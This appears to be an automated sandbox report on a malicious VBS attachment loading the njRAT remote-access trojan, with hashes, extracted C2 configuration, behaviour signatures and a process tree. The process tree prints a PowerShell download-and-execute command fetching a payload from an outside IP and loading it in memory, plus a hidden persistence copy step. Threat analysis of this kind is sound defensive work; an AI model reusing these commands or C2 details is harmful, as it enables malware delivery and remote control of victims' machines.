Analysis
- max time kernel: 148s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 09/10/2022, 06:14

Static task: static1
Behavioral task: behavioral1
Sample: 56325762828282 COBRO JURIDICO.vbs
Resource: win7-20220901-en
General
- Target: 56325762828282 COBRO JURIDICO.vbs
- Size: 437KB
- MD5: 3ae400fde403322cee0a88408828cba8
- SHA1: 7aac489534006c5de8080d639f29f9fdcc5a0079
- SHA256: 3b8b7f389603923a9fabf32a34ba6301ed3df38ee7eeaac068c8c108409b5532
- SHA512: 2c435502f2900ed9d45c340e35e3f41110e6dfd981c60898bf30a4d8e971435f80674b6073d05faf33fae6ef7a907c3e9908586051155ced341878c5dfbb6084
- SSDEEP: 48:kklC0eHz7/m7rJv4PsfbuUbNbbldPQ/Pe20NrFR4PLEvvldI:nl+/mrOeqUZldSPKNrY4vvldI
Malware Config
Extracted (payload download URL used by the PowerShell stage)
- http://20.7.14.99/dll/dll_ink.pdf
Extracted (RAT configuration)
- family: njrat
- version: 0.7NC
- botnet: NYAN CAT
- c2: proyecto23.dnsdojo.org:2023
- mutex: 5b53b16e809d
- reg_key: 5b53b16e809d
- splitter: @!#&^%$
Signatures
- Blocklisted process makes network request (2 IoCs)
    flow  pid   Process
    4     2180  powershell.exe
    6     2180  powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
    description        ioc                                                                                              Process
    Key value queried  \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation  WScript.exe
- Drops startup file (1 IoC)
    description   ioc                                                                                         Process
    File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk   powershell.exe
- Suspicious use of SetThreadContext (1 IoC)
    description                          pid   Process         procid_target
    PID 2180 set thread context of 1552  2180  powershell.exe  86
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
    pid   Process
    2180  powershell.exe
    2180  powershell.exe
    1504  powershell.exe
    1504  powershell.exe
- Suspicious use of AdjustPrivilegeToken (37 IoCs)
    description                        pid   Process
    Token: SeDebugPrivilege            2180  powershell.exe
    Token: SeDebugPrivilege            1504  powershell.exe
    Token: SeDebugPrivilege            1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
    Token: 33                          1552  cvtres.exe
    Token: SeIncBasePriorityPrivilege  1552  cvtres.exe
- Suspicious use of WriteProcessMemory (12 IoCs)
    description                        pid   Process         procid_target
    PID 4832 wrote to memory of 2180   4832  WScript.exe     82
    PID 4832 wrote to memory of 2180   4832  WScript.exe     82
    PID 2180 wrote to memory of 1504   2180  powershell.exe  84
    PID 2180 wrote to memory of 1504   2180  powershell.exe  84
    PID 2180 wrote to memory of 1552   2180  powershell.exe  86
    PID 2180 wrote to memory of 1552   2180  powershell.exe  86
    PID 2180 wrote to memory of 1552   2180  powershell.exe  86
    PID 2180 wrote to memory of 1552   2180  powershell.exe  86
    PID 2180 wrote to memory of 1552   2180  powershell.exe  86
    PID 2180 wrote to memory of 1552   2180  powershell.exe  86
    PID 2180 wrote to memory of 1552   2180  powershell.exe  86
    PID 2180 wrote to memory of 1552   2180  powershell.exe  86
Processes (tree; indentation shows parent/child relationship)
- C:\Windows\System32\WScript.exe (PID 4832)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56325762828282 COBRO JURIDICO.vbs"
  Signatures:
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2180)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('0/YUskG/d/ee.etsap//:sptth'))
    Signatures:
    - Blocklisted process makes network request
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe (PID 1504)
      Command line: "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 1552)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
      Signatures:
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 2KB
  MD5: 6cf293cb4d80be23433eecf74ddb5503
  SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
  SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
  SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
- Filesize: 1KB
  MD5: 7ae41ba310b3e0f4fc4c6eff982554fd
  SHA1: 1a382df614c494ff947f88817b9f0fbc76de3a68
  SHA256: 93939edea4456184f43eeffda4f6e82f125bf5cead24cebcf317aa3fe83efcce
  SHA512: 8e13185cab71046bb411dae56ccaabd547d3bf961c200fc307f2961eb9caf175dd08631ecf6512578dd333dac3640e653f93115c840b3344648f2a597e789223